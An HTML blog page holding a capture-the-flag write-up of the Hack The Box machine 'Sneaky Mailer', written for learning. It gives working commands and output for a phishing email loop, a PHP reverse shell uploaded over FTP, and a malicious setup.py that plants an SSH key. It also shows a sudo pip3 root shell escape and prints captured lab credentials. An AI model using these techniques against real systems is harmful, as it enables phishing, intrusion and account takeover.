<!doctype html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>M4t35Z's Blog - basic edition</title>
	<link rel="stylesheet" type="text/css" href="//m4t3sz.gitlab.io/bsc/style.css"/>
</head>

<div id="header">
	<a id="headerLink" href="//m4t3sz.gitlab.io/bsc/">m4t3sz.gitlab.io/bsc</a>
	<span> - </span>
	<span id="headerSubtitle">M4t35Z's Blog - basic edition</span>
</div>
<hr />
<div id="menu">
	<a href="//m4t3sz.gitlab.io/"><b>home</b></a>
	<a href="//twitter.com/szilak44/">twitter</a>
	<a href="//github.com/matesz44/">github</a>
	<a href="//github.com/matesz44/dotfiles/">dotfiles</a>
	<a href="//github.com/matesz44/scripts/">scripts</a>
	<span class="right">
		<a href="//gitlab.com/m4t3sz/sites/">source</a>
	</span>
</div>
<hr />
<div id="content">
<div id="nav">
	<ul>
	<li><a href="/bsc">about</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/showcase/">showcase/</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/writeup/"><b>>writeup/</b></a>
		<ul>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/bug/">bug/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/">ctf/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/"><b>>htb/</b></a>
			<ul>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/buff/">buff/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/feline/">feline/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/omni/">omni/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/openkeys/">openkeys/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/sneaky_mailer/"><b>>sneaky mailer/</b></a>
				<ul>
				<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/sneaky_mailer/img/">img/</a></li>
				</ul>
			</li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/time/">time/</a></li>
			</ul>
		</li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/">thm/</a></li>
		</ul>
	</li>
	</ul>
</div>
<hr />
<div id="main">

<h1>Table of Contents</h1>
<ul>
<li>1 Box Information</li>
<li>2 Recon</li>
<li>2.1 sneakycorp.htb - 80 TCP</li>
<li>2.1.1 Subdomain fuzzing</li>
<li>2.2 dev.sneakycorp.htb - TCP 80</li>
<li>2.3 smtp - 25 TCP</li>
<li>2.3.1 Metasploit auto enum</li>
<li>2.3.2 Manual enum</li>
<li>2.3.3 Sending phishing emails</li>
<li>2.4 imap - TCP 143, 993(ssl)</li>
<li>2.5 ftp - TCP 21</li>
<li>2.5.1 Getting a revshell</li>
<li>3 Privilege Escalation from www-data</li>
<li>3.1 linpeas</li>
<li>4 Privilege Escalation from developer</li>
<li>5 Privilege Escalation from low</li>
</ul>
<h1>Box Information</h1>
<pre><code>Name:       | Sneaky Mailer
OS:         | Linux
Difficulty: | Medium
Points:     | 30
Release:    | 11 Jul 2020
IP:         | 10.10.10.197
</code></pre>
<h1>Recon</h1>
<p>Nmap tcp:</p>
<pre><code>nmap -sC -sV -T4 -p- 10.10.10.197 -oA scans/nmap.full
</code></pre>
<pre><code>[sudo] password for matesz:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-12 18:07 CEST
Nmap scan report for 10.10.10.197
Host is up (0.047s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp   open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: QUOTA UIDPLUS STARTTLS completed ACL UTF8=ACCEPTA0001 SORT CHILDREN ENABLE THREAD=ORDEREDSUBJECT THREAD=REFERENCES ACL2=UNION IMAP4rev1 CAPABILITY O
K NAMESPACE IDLE
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: QUOTA UIDPLUS completed ACL UTF8=ACCEPTA0001 AUTH=PLAIN SORT CHILDREN CAPABILITY THREAD=ORDEREDSUBJECT THREAD=REFERENCES NAMESPACE IMAP4rev1 ENABLE
OK ACL2=UNION IDLE
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.99 seconds
</code></pre>
<p>Nmap udp:</p>
<pre><code>nmap -sU 10.10.10.197 -oA scans/nmap.udp
</code></pre>
<pre><code>Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-12 18:12 CEST
Nmap scan report for 10.10.10.197
Host is up (0.048s latency).
Not shown: 995 closed ports
PORT      STATE         SERVICE
17459/udp filtered      unknown
18821/udp filtered      unknown
20126/udp open|filtered unknown
20817/udp open|filtered unknown
22739/udp filtered      unknown

Nmap done: 1 IP address (1 host up) scanned in 1047.43 seconds
</code></pre>
<ul>
<li>TL;DR: 21(ftp), 22(ssh), 25(smtp), 80(http), 143(imap), 993(imap ssl), 8080(http)</li>
</ul>
<h2>sneakycorp.htb - 80 TCP</h2>
<p>Since the ip address redirects to http://sneakycorp.htb/ I added it to my /etc/hosts file.</p>
<p>I tried to open http://sneakycorp.htb but it hanged forever.</p>
<h3>Subdomain fuzzing</h3>
<p>I used wfuzz to fuzz subdomains.</p>
<pre><code>wfuzz --hh 0 --hw 12 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H &quot;Host: FUZZ.sneakycorp.htb&quot; http://sneakycorp.htb/
</code></pre>
<p><img src="img/subdomains.png" alt="subdomains" /></p>
<ul>
<li>I got one: <code>dev</code></li>
</ul>
<p>I added <code>dev.sneakycorp.htb</code> to my /etc/hosts file.</p>
<pre><code>10.10.10.197 sneakycorp.htb dev.sneakycorp.htb
</code></pre>
<h2>dev.sneakycorp.htb - TCP 80</h2>
<p>There is a page http://dev.sneakycorp.htb/team.php where I found a lot of email addresses.</p>
<p>I curled the page and saved the output into a file.</p>
<pre><code>curl dev.sneakycorp.htb/team.php &gt; teamspage.html
</code></pre>
<p>I made a new file <code>team_awkable.lst</code> with a little bit of vim macros to format the file.</p>
<pre><code>Tiger Nixon:System Architect:Edinburgh:tigernixon@sneakymailer.htb
---SNIP---
Donna Snider:Customer Support:New York:donnasnider@sneakymailer.htb
</code></pre>
<p>I can now use <code>awk</code> to save only the emails from the file.</p>
<pre><code class="language-awk">awk -F: '{print $4}' team_awkable.lst &gt; team_emails.lst
</code></pre>
<p>Emails.lst(57 lines):</p>
<pre><code>tigernixon@sneakymailer.htb
garrettwinters@sneakymailer.htb
ashtoncox@sneakymailer.htb
cedrickelly@sneakymailer.htb
airisatou@sneakymailer.htb
briellewilliamson@sneakymailer.htb
herrodchandler@sneakymailer.htb
rhonadavidson@sneakymailer.htb
colleenhurst@sneakymailer.htb
sonyafrost@sneakymailer.htb
jenagaines@sneakymailer.htb
quinnflynn@sneakymailer.htb
chardemarshall@sneakymailer.htb
haleykennedy@sneakymailer.htb
tatyanafitzpatrick@sneakymailer.htb
michaelsilva@sneakymailer.htb
paulbyrd@sneakymailer.htb
glorialittle@sneakymailer.htb
bradleygreer@sneakymailer.htb
dairios@sneakymailer.htb
jenettecaldwell@sneakymailer.htb
yuriberry@sneakymailer.htb
caesarvance@sneakymailer.htb
doriswilder@sneakymailer.htb
angelicaramos@sneakymailer.htb
gavinjoyce@sneakymailer.htb
jenniferchang@sneakymailer.htb
brendenwagner@sneakymailer.htb
fionagreen@sneakymailer.htb
shouitou@sneakymailer.htb
michellehouse@sneakymailer.htb
sukiburks@sneakymailer.htb
prescottbartlett@sneakymailer.htb
gavincortez@sneakymailer.htb
martenamccray@sneakymailer.htb
unitybutler@sneakymailer.htb
howardhatfield@sneakymailer.htb
hopefuentes@sneakymailer.htb
vivianharrell@sneakymailer.htb
timothymooney@sneakymailer.htb
jacksonbradshaw@sneakymailer.htb
olivialiang@sneakymailer.htb
brunonash@sneakymailer.htb
sakurayamamoto@sneakymailer.htb
thorwalton@sneakymailer.htb
finncamacho@sneakymailer.htb
sergebaldwin@sneakymailer.htb
zenaidafrank@sneakymailer.htb
zoritaserrano@sneakymailer.htb
jenniferacosta@sneakymailer.htb
carastevens@sneakymailer.htb
hermionebutler@sneakymailer.htb
laelgreer@sneakymailer.htb
jonasalexander@sneakymailer.htb
shaddecker@sneakymailer.htb
sulcud@sneakymailer.htb
donnasnider@sneakymailer.htb
</code></pre>
<p>I also made a <code>team_users.lst</code> which only included the username before the <code>@</code>.</p>
<pre><code class="language-awk">awk -F@ '{print $1}' team_emails.lst &gt; team_users.lst
</code></pre>
<h2>smtp - 25 TCP</h2>
<h3>Metasploit auto enum</h3>
<p>I used <code>msfconsole</code>'s smtp enum script.</p>
<pre><code>msfconsole
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS 10.10.10.197
run
</code></pre>
<p>I got some users:</p>
<pre><code>[+] 10.10.10.197:25       - 10.10.10.197:25 Users found: , _apt, avahi-autoipd, backup, bin, daemon, ftp, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, postfix, postmaster, proxy, sshd, sync, sys, systemd-coredump, systemd-network, systemd-resolve, systemd-timesync, uucp, www-data
</code></pre>
<ul>
<li>But nothing interesting</li>
</ul>
<p>Oh wait I can set a users file!</p>
<pre><code>set USER_FILE team_emails.lst
</code></pre>
<p>I ran it and got some valid users:</p>
<p><img src="img/msf_smtp_user_enum.png" alt="msf_smtp_user_enum" /></p>
<pre><code>[+] 10.10.10.197:25       - 10.10.10.197:25 Users found: airisatou@sneakymailer.htb, angelicaramos@sneakymailer.htb, ashtoncox@sneakymailer.htb, bradleygreer@sneakymailer.htb, brendenwagner@sneakymailer.htb, briellewilliamson@sneakymailer.htb, brunonash@sneakymailer.htb, caesarvance@sneakymailer.htb, carastevens@sneakymailer.htb, cedrickelly@sneakymailer.htb, chardemarshall@sneakymailer.htb, colleenhurst@sneakymailer.htb, dairios@sneakymailer.htb, donnasnider@sneakymailer.htb, doriswilder@sneakymailer.htb, finncamacho@sneakymailer.htb, fionagreen@sneakymailer.htb, garrettwinters@sneakymailer.htb, gavincortez@sneakymailer.htb, gavinjoyce@sneakymailer.htb, glorialittle@sneakymailer.htb, haleykennedy@sneakymailer.htb, hermionebutler@sneakymailer.htb, herrodchandler@sneakymailer.htb, hopefuentes@sneakymailer.htb, howardhatfield@sneakymailer.htb, jacksonbradshaw@sneakymailer.htb, jenagaines@sneakymailer.htb, jenettecaldwell@sneakymailer.htb, jenniferacosta@sneakymailer.htb, jenniferchang@sneakymailer.htb, jonasalexander@sneakymailer.htb, laelgreer@sneakymailer.htb, martenamccray@sneakymailer.htb, michaelsilva@sneakymailer.htb, michellehouse@sneakymailer.htb, olivialiang@sneakymailer.htb, paulbyrd@sneakymailer.htb, prescottbartlett@sneakymailer.htb, quinnflynn@sneakymailer.htb, rhonadavidson@sneakymailer.htb, sakurayamamoto@sneakymailer.htb, sergebaldwin@sneakymailer.htb, shaddecker@sneakymailer.htb, shouitou@sneakymailer.htb, sonyafrost@sneakymailer.htb, sukiburks@sneakymailer.htb, sulcud@sneakymailer.htb, tatyanafitzpatrick@sneakymailer.htb, thorwalton@sneakymailer.htb, tigernixon@sneakymailer.htb, timothymooney@sneakymailer.htb, unitybutler@sneakymailer.htb, vivianharrell@sneakymailer.htb, yuriberry@sneakymailer.htb, zenaidafrank@sneakymailer.htb, zoritaserrano@sneakymailer.htb
</code></pre>
<ul>
<li>This is exactly 57 entry so all the users are valid</li>
</ul>
<h3>Manual enum</h3>
<p>I searched for <em>smtp enum techinques</em> on ddg and found <a href="https://www.hackingarticles.in/4-ways-smtp-enumeration/">this</a> article.</p>
<p>Since I have 57 possible email addresses I must verify them in order to decrease this big number of possibilities.</p>
<blockquote><p>If you received a message code 250,251,252 which means the server has accepted the request and user account is valid.
But if you received a message code 550 it means invalid user account as shown in given image</p>
</blockquote>
<p>Firstly I connected with telnet:</p>
<pre><code>telnet 10.10.10.197 25
</code></pre>
<p>I got this output:</p>
<pre><code>Trying 10.10.10.197...
Connected to 10.10.10.197.
Escape character is '^]'.
220 debian ESMTP Postfix (Debian/GNU)
</code></pre>
<ul>
<li>Yaaay I'm in!</li>
</ul>
<p>Now I started verifying the emails one-by-one.</p>
<pre><code>vrfy tigernixon@sneakymailer.htb
252 2.0.0 tigernixon@sneakymailer.htb
</code></pre>
<p><img src="img/telnet_smtp_manual.png" alt="telnet_smtp_manual" /></p>
<h3>Sending phishing emails</h3>
<p>I used <code>swaks</code> to send the emails.</p>
<pre><code>swaks --to tigernixon@sneakymailer.htb --from me@sneakymailer.htb --header &quot;Subject: dev&quot; --body &quot;development dev cv http://10.10.14.211/&quot; --server sneakycorp.htb
</code></pre>
<p><img src="img/swaks_test_success.png" alt="swaks_test_success" /></p>
<ul>
<li>I successfully sent a mail with this command</li>
</ul>
<p>Now time to write a script to test all the 57 addresses.</p>
<pre><code class="language-sh">#!/bin/sh

for E in `cat $1`
do
    swaks --to $E --from me@sneakymailer.htb --header &quot;Subject: dev&quot; --body &quot;development dev cv http://10.10.14.211/&quot; --server sneakycorp.htb
    [ $? -ne 0 ] &amp;&amp; echo $E
done
</code></pre>
<p>I ran it <code>sh smtp_phisher.sh team_emails.lst</code> while I was listening on port 80 with nc:</p>
<p>I let the script run for some minutes and I got a req on my nc!</p>
<p><img src="img/phished_req.png" alt="phished_req" /></p>
<pre><code>sudo nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.211] from (UNKNOWN) [10.10.10.197] 57556
POST / HTTP/1.1
Host: 10.10.14.211
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&amp;lastName=Byrd&amp;email=paulbyrd%40sneakymailer.htb&amp;password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&amp;rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt
</code></pre>
<p>Url decoded:</p>
<pre><code>firstName=Paul&amp;lastName=Byrd&amp;email=paulbyrd@sneakymailer.htb&amp;password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl&lt;:Ht&amp;rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl&lt;:Ht
</code></pre>
<ul>
<li>There are credentials in the request!</li>
</ul>
<pre><code>paulbyrd@sneakymailer.htb:^(#J@SkFv2[%KhIxKk(Ju`hqcHl&lt;:Ht
</code></pre>
<p>I tried to login to ssh with the creds I got.</p>
<pre><code>ssh paulbyrd@10.10.10.197
</code></pre>
<ul>
<li>no luck</li>
</ul>
<h2>imap - TCP 143, 993(ssl)</h2>
<p>I tried to log into an email client (<code>evolution</code>) with the creds I found!</p>
<p><img src="img/evolution_1.png" alt="evolution_1" /></p>
<p><img src="img/evolution_2.png" alt="evolution_2" /></p>
<p><img src="img/evolution_3.png" alt="evolution_3" /></p>
<p><img src="img/evolution_4.png" alt="evolution_4" /></p>
<p><img src="img/evolution_5.png" alt="evolution_5" /></p>
<p>I hit apply then it asked for the password.</p>
<p><img src="img/evolution_6.png" alt="evolution_6" /></p>
<p>I gave it and hit OK.</p>
<p>I found some emails and there is one with an ftp credential inside it!</p>
<p><img src="img/creds_in_email.png" alt="creds_in_email" /></p>
<pre><code>developer:m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
</code></pre>
<h2>ftp - TCP 21</h2>
<p>I logged in with the new creds I got.</p>
<p><img src="img/ftp_loggedin.png" alt="ftp_loggedin" /></p>
<ul>
<li>There is a directory called <code>dev</code></li>
</ul>
<pre><code>ftp&gt; cd dev
250 Directory successfully changed.
ftp&gt; ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    8 0        1001         4096 Jul 13 10:34 .
drwxr-xr-x    3 0        0            4096 Jun 23 08:15 ..
drwxr-xr-x    2 0        0            4096 May 26 19:52 css
drwxr-xr-x    2 0        0            4096 May 26 19:52 img
-rwxr-xr-x    1 0        0           13742 Jun 23 09:44 index.php
drwxr-xr-x    3 0        0            4096 May 26 19:52 js
drwxr-xr-x    2 0        0            4096 May 26 19:52 pypi
drwxr-xr-x    4 0        0            4096 May 26 19:52 scss
-rwxr-xr-x    1 0        0           26523 May 26 20:58 team.php
drwxr-xr-x    8 0        0            4096 May 26 19:52 vendor
226 Directory send OK.
</code></pre>
<ul>
<li>This is the webpage's source directory!</li>
<li>I can try upload a php-reverse-shell.php in order to get a reverse shell.</li>
</ul>
<h3>Getting a revshell</h3>
<p>So I modified(ip port) and copied /usr/share/webshells/php/php-reverse-shell.php to the webserver.</p>
<pre><code>ftp&gt; put ayyrev.php
local: ayyrev.php remote: ayyrev.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5494 bytes sent in 0.00 secs (37.1595 MB/s)
ftp&gt; ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
--wxrw-rw-    1 1001     1001         5494 Jul 13 10:56 ayyrev.php
drwxr-xr-x    2 0        0            4096 May 26 19:52 css
drwxr-xr-x    2 0        0            4096 May 26 19:52 img
-rwxr-xr-x    1 0        0           13742 Jun 23 09:44 index.php
drwxr-xr-x    3 0        0            4096 May 26 19:52 js
drwxr-xr-x    2 0        0            4096 May 26 19:52 pypi
drwxr-xr-x    4 0        0            4096 May 26 19:52 scss
-rwxr-xr-x    1 0        0           26523 May 26 20:58 team.php
drwxr-xr-x    8 0        0            4096 May 26 19:52 vendor
226 Directory send OK.
</code></pre>
<p>I started an nc listener and went to http://dev.sneakycorp.htb/ayyrev.php to execute the reverse shell.</p>
<ul>
<li><strong>Note:</strong> Be fast with the upload and execution because there is an av or something which deleted my revshell.</li>
</ul>
<p><img src="img/gotuser_www-data.png" alt="gotuser_www-data" /></p>
<ul>
<li>I successfully got into the box as <code>www-data</code>!</li>
</ul>
<h1>Privilege Escalation from www-data</h1>
<p>Firstly I made my shell a tty:</p>
<pre><code>python -c 'import pty;pty.spawn(&quot;/bin/bash&quot;)'
</code></pre>
<p>Since I have a password for the user <code>developer</code> I tried to use this password with su because ssh didn't work.</p>
<pre><code>su developer
Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
</code></pre>
<pre><code>id
uid=1001(developer) gid=1001(developer) groups=1001(developer)
</code></pre>
<ul>
<li>I have successfully evelated my privileges to the <code>developer</code> user!</li>
</ul>
<h2>linpeas</h2>
<p>Interesting lines:</p>
<pre><code>[+] Files inside /var/www (limit 20)
total 24
drwxr-xr-x  6 root root 4096 May 14 18:25 .
drwxr-xr-x 12 root root 4096 May 14 13:09 ..
drwxr-xr-x  3 root root 4096 Jun 23 08:15 dev.sneakycorp.htb
drwxr-xr-x  2 root root 4096 May 14 13:12 html
drwxr-xr-x  4 root root 4096 May 15 14:29 pypi.sneakycorp.htb
drwxr-xr-x  8 root root 4096 Jun 23 09:48 sneakycorp.htb
</code></pre>
<ul>
<li>There is a new subdomain <code>pypi.sneakycorp.htb</code></li>
</ul>
<p>I took a look at <code>/etc/nginx/sites-enabled/pypi.sneakycorp.htb</code>.</p>
<pre><code>server {
        listen 0.0.0.0:8080 default_server;
        listen [::]:8080 default_server;
        server_name _;
}


server {
        listen 0.0.0.0:8080;
        listen [::]:8080;

        server_name pypi.sneakycorp.htb;

        location / {
                proxy_pass http://127.0.0.1:5000;
                proxy_set_header Host $host;
                proxy_set_header X-Real-IP $remote_addr;
        }
}
</code></pre>
<ul>
<li>It's on port 8080!</li>
</ul>
<p>I added the new subdomain to my /etc/hosts file</p>
<pre><code>10.10.10.197 sneakycorp.htb dev.sneakycorp.htb pypi.sneakycorp.htb
</code></pre>
<p>I also took a look at the source(<code>/var/www/pypi.sneakycorp.htb</code>):</p>
<p>There is a username and a hash in .htpasswd:</p>
<pre><code>pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
</code></pre>
<p>I saved it into <code>pypi.hash</code> and started cracking with hashcat:</p>
<pre><code>cat pypi.hash
$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
</code></pre>
<ul>
<li><strong>Note</strong>: I removed the <code>pypi:</code> (username) from my hashfile</li>
</ul>
<p>I searched for apr1 in the example hashes and found its mode was 1600 so I used it:</p>
<pre><code>hashcat --example-hashes | less
</code></pre>
<pre><code>hashcat -m 1600 pypi.hash /usr/share/wordlists/rockyou.txt
</code></pre>
<ul>
<li>I got a password <code>soufianeelhaoui</code></li>
</ul>
<h1>Privilege Escalation from developer</h1>
<p>Looking at the output of <code>ps aux</code> I realized python stuff always runs as user <code>low</code> so maybe if I can exploit pypiserver I can get to the higher user.</p>
<p><a href="http://pypi.sneakycorp.htb:8080">http://pypi.sneakycorp.htb:8080</a></p>
<p><img src="img/pypipage.png" alt="pypipage" /></p>
<p><img src="img/pypi_creds_needed.png" alt="pypi_creds_needed" /></p>
<ul>
<li>I gave it the previously cracked creds and I got in but there were nothing in the page</li>
</ul>
<p>I searched for pypiserver vulnerabilities but I didn't find anything except the <a href="https://buildmedia.readthedocs.org/media/pdf/pypiserver/latest/pypiserver.pdf">documentation</a> (unfortunately this link is dead now but I found another great one on the <a href="https://pypi.org/project/pypiserver/#upload-with-setuptools">official pypi page</a>) of pypiserver.</p>
<p>Example .pypirc:</p>
<pre><code>[distutils]
index-servers =
    pypi
    internal
[pypi]
    username:pypiusername
    password:pypipasswd
[internal]
    repository: http://127.0.0.1:8080
    username: myusername
    password: mypasswd
</code></pre>
<p>I edited this a littlebit:</p>
<pre><code>[distutils]
index-servers =
    ayy
[ayy]
    repository: http://pypi.sneakycorp.htb:8080
    username: pypi
    password: soufianeelhaoui
</code></pre>
<ul>
<li>I saved this file into /tmp/.ayy/.pypirc</li>
<li>Then I <code>chmod 600 .pypirc</code> on the box</li>
</ul>
<p>I made a custom <code>setup.py</code> file too <a href="https://pythonhosted.org/an_example_pypi_project/setuptools.html">example</a></p>
<p><code>setup.py</code> file gets executed so I must put in some malicious content like writing my ssh publickey to low's authorized_keys file in order to be able to log in without any password.</p>
<p>setup.py:</p>
<pre><code class="language-py">from setuptools import *

try:
    f = open('/home/low/.ssh/authorized_keys', 'a')
    f.write('\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMjIupyWtjNs4Cq2PFufHj8NO/u4Sf3EQH+oXs6FwUYQ5nMOcHF2c3B+KdsLlKqSloN/uZsvPaJe+U8nnHsN7U6K6ulhfHOkoha9CkJsXheWmHiMbPODY2SuSiOER7anSQyhDfkE7ICw2pPPwRZ/6wFA4MCbXsqveDhpn3Mc1NUq+EAT2gXaMk0LQhJYJd+160Ff37a0MYaqnLiOBK4l7G5WFiQFKHL/6a8Zdym5pW/O9PO9Zs0oeK/o9xMJStYCdgzrIEjbE5b4DNwTM5slRs7tBymFP90V13UqT4oUI8eX7Q7fkL8fNCDfYbWDucnbjSPG6KhUWaI77fjupXJfKOfDHIlYQxUBgpklI0o2fSKXVMeuiflyj4hropd4LnAw/k7OQZXBdE4CJyxuTRsx5+HW2SgeLoD9JvS2yfdVVEjGh1/Om7bAWhiKUfGVEfiXeJfPJRbuxNmUxiGs5weOws0/+Z76VakbPEd8rJnWjx7LShsUl8NnGuILyLbppfYTc= matesz@MLKali')
    f.close()
except:
    pass

setup(
    name = &quot;ayy&quot;,
    version = &quot;0.0.4&quot;,
    author = &quot;ayyooo&quot;,
    author_email = &quot;yaboi&quot;,
    description = (&quot;Nothing&quot;),
    license = &quot;BSD&quot;,
    keywords = &quot;example documentation tutorial&quot;,
    url = &quot;http://packages.python.org/an_example_pypi_project&quot;,
    packages=find_packages(),
    classifiers=[
        &quot;Development Status :: 3 - Alpha&quot;,
        &quot;Topic :: Utilities&quot;,
        &quot;License :: OSI Approved :: BSD License&quot;,
    ],
)
</code></pre>
<p>Run:</p>
<pre><code>mkdir ayy
HOME=$(pwd)
python3 setup.py sdist register -r ayy upload -r ayy
</code></pre>
<p><img src="img/pip_ran_successfully.png" alt="pip_ran_successfully" /></p>
<p>I logged into ssh as <code>low</code>:</p>
<pre><code>ssh low@10.10.10.197
</code></pre>
<p><img src="img/gotuser_low.png" alt="gotuser_low" /></p>
<pre><code>hostname;id;wc user.txt
sneakymailer
uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
 1  1 33 user.txt
</code></pre>
<p>I have access to the user flag now(<code>user.txt:4c857----------------------5dfb6</code>)</p>
<h1>Privilege Escalation from low</h1>
<p>I ran <code>sudo -l</code> and I found out I can run <code>pip3</code> <strong>without any password</strong> as root!</p>
<pre><code>sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3
</code></pre>
<p><a href="https://gtfobins.github.io/gtfobins/pip/#sudo">https://gtfobins.github.io/gtfobins/pip/#sudo</a></p>
<pre><code>TF=$(mktemp -d)
echo &quot;import os; os.execl('/bin/sh', 'sh', '-c', 'sh &lt;$(tty) &gt;$(tty) 2&gt;$(tty)')&quot; &gt; $TF/setup.py
sudo pip3 install $TF
</code></pre>
<p><img src="img/gotuser_root.png" alt="gotuser_root" /></p>
<ul>
<li><strong>Note:</strong> sudo is very slow so wait some seconds. (+info from <a href="https://youtu.be/f4vQhI4ADmI?t=2982">ippsec's video</a>: Sudo will look up the box's hostname and if it's not reachable(in /etc/hosts your box usually has a line saying <code>127.0.0.1 &lt;YourHostName&gt;</code> for me it's <code>127.0.0.1 MLKali</code>) and sudo just waits until it gets a timeout (it's usually around half a minute))</li>
</ul>
<pre><code>hostname;id;wc /root/root.txt
sneakymailer
uid=0(root) gid=0(root) groups=0(root)
 1  1 33 /root/root.txt
</code></pre>
<p>I have access to the root flag now (<code>root.txt:cd876----------------------19d47</code>)</p>
</div>

</div>

<hr /><hr />
<footer>
	<p>Author: M4t35Z</p>
	<p><a href="https://www.buymeacoffee.com/m4t35z">Support the creator (buymeacoffee)</a></p>
	<p><i>Created with <a href="https://github.com/karlb/smu/">smu</a> + <a href="https://git.suckless.org/sites/">suckless style</a></i></p>
</footer>
</html>
